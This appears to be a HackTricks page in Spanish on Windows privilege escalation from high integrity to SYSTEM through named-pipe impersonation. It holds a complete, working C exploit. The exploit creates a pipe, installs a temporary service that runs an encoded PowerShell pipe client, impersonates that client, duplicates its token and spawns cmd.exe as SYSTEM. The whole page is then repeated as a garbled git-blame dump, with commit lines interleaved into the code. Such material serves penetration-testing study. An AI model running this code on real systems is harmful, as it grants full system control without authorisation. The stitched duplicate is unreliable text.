hacktricks/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!

- Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)

- Obtén la [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)

- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Comparte tus trucos de hacking enviando PRs al [repositorio hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>


**Flujo de código:**

1. Crear un nuevo Pipe
2. Crear y ejecutar un servicio que se conectará al pipe creado y escribirá algo. El código del servicio ejecutará este código PS codificado: `$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
3. El servicio recibe los datos del cliente en el pipe, llama a ImpersonateNamedPipeClient y espera a que el servicio termine
4. Finalmente, utiliza el token obtenido del servicio para generar un nuevo _cmd.exe_.

{% hint style="warning" %}
Si no tienes suficientes privilegios, la explotación puede quedarse atascada y nunca devolver el control.
{% endhint %}
```c
#include <windows.h>
#include <time.h>

#pragma comment (lib, "advapi32")
#pragma comment (lib, "kernel32")

#define PIPESRV "PiperSrv"
#define MESSAGE_SIZE 512

int ServiceGo(void) {

	SC_HANDLE scManager;
	SC_HANDLE scService;

	scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);

	if (scManager == NULL) {
		return FALSE;
	}

	// create Piper service
	scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
		SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
		"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
		NULL, NULL, NULL, NULL, NULL);

	if (scService == NULL) {
		//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
		return FALSE;
	}

	// launch it
	StartService(scService, 0, NULL);

	// wait a bit and then cleanup
	Sleep(10000);
	DeleteService(scService);

	CloseServiceHandle(scService);
	CloseServiceHandle(scManager);
}

int main() {

	LPCSTR sPipeName = "\\\\.\\pipe\\piper";
	HANDLE hSrvPipe;
	HANDLE th;
	BOOL bPipeConn;
	char pPipeBuf[MESSAGE_SIZE];
	DWORD dBRead = 0;

	HANDLE hImpToken;
	HANDLE hNewToken;
	STARTUPINFOA si;
	PROCESS_INFORMATION pi;

	// open pipe
	hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
		PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);

	// create and run service
	th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);

	// wait for the connection from the service
	bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
	if (bPipeConn) {
		ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);

		// impersonate the service (SYSTEM)
		if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
			return -1;
		}

		// wait for the service to cleanup
		WaitForSingleObject(th, INFINITE);

		// get a handle to impersonated token
		if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {
			return -2;
		}

		// create new primary token for new process
		if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,
			TokenPrimary, &hNewToken)) {
			return -4;
		}

		//Sleep(20000);
		// spawn cmd.exe as full SYSTEM user
		ZeroMemory(&si, sizeof(si));
		si.cb = sizeof(si);
		ZeroMemory(&pi, sizeof(pi));
		if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,
			NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
			return -5;
		}

		// revert back to original security context
		RevertToSelf();

	}

	return 0;
}
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!

- Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)

- Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)

- **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- Obtén la [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- Únete al [💬](https://emojipedia.org/speech-balloon/) grupo de Discord o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- Comparte tus trucos de hacking enviando PRs al [repositorio hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


Translated to Spanish 2023-06-03 01:46:23 +00:00			`Flujo de código:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`1. Crear un nuevo Pipe`
			2. Crear y ejecutar un servicio que se conectará al pipe creado y escribirá algo. El código del servicio ejecutará este código PS codificado: `$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
			`3. El servicio recibe los datos del cliente en el pipe, llama a ImpersonateNamedPipeClient y espera a que el servicio termine`
			`4. Finalmente, utiliza el token obtenido del servicio para generar un nuevo _cmd.exe_.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] one page modified 2020-12-28 14:16:10 +00:00			`{% hint style="warning" %}`
Translated to Spanish 2023-06-03 01:46:23 +00:00			`Si no tienes suficientes privilegios, la explotación puede quedarse atascada y nunca devolver el control.`
GitBook: [master] one page modified 2020-12-28 14:16:10 +00:00			`{% endhint %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```c
			`#include <windows.h>`
			`#include <time.h>`

			`#pragma comment (lib, "advapi32")`
			`#pragma comment (lib, "kernel32")`

			`#define PIPESRV "PiperSrv"`
			`#define MESSAGE_SIZE 512`

			`int ServiceGo(void) {`

			`SC_HANDLE scManager;`
			`SC_HANDLE scService;`

			`scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);`

			`if (scManager == NULL) {`
			`return FALSE;`
			`}`

			`// create Piper service`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,`
			`SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,`
			"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
			`NULL, NULL, NULL, NULL, NULL);`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`if (scService == NULL) {`
			`//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());`
			`return FALSE;`
			`}`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// launch it`
			`StartService(scService, 0, NULL);`

			`// wait a bit and then cleanup`
			`Sleep(10000);`
			`DeleteService(scService);`

			`CloseServiceHandle(scService);`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`CloseServiceHandle(scManager);`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`int main() {`

GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`LPCSTR sPipeName = "\\\\.\\pipe\\piper";`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`HANDLE hSrvPipe;`
			`HANDLE th;`
			`BOOL bPipeConn;`
			`char pPipeBuf[MESSAGE_SIZE];`
			`DWORD dBRead = 0;`

			`HANDLE hImpToken;`
			`HANDLE hNewToken;`
			`STARTUPINFOA si;`
			`PROCESS_INFORMATION pi;`

			`// open pipe`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE \| PIPE_WAIT,`
			`PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);`

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// create and run service`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);`

GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// wait for the connection from the service`
			`bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);`
			`if (bPipeConn) {`
			`ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// impersonate the service (SYSTEM)`
			`if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {`
			`return -1;`
			`}`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// wait for the service to cleanup`
			`WaitForSingleObject(th, INFINITE);`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// get a handle to impersonated token`
			`if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`return -2;`
			`}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`// create new primary token for new process`
			`if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`TokenPrimary, &hNewToken)) {`
			`return -4;`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`//Sleep(20000);`
			`// spawn cmd.exe as full SYSTEM user`
			`ZeroMemory(&si, sizeof(si));`
			`si.cb = sizeof(si);`
			`ZeroMemory(&pi, sizeof(pi));`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00			`if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,`
			`NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`return -5;`
			`}`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`// revert back to original security context`
			`RevertToSelf();`
GitBook: [master] one page modified 2020-12-28 14:14:40 +00:00
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`}`

			`return 0;`
			`}`
			```
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Revisa los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- Únete al [💬](https://emojipedia.org/speech-balloon/) grupo de Discord o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Spanish 2023-06-03 01:46:23 +00:00			`- Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`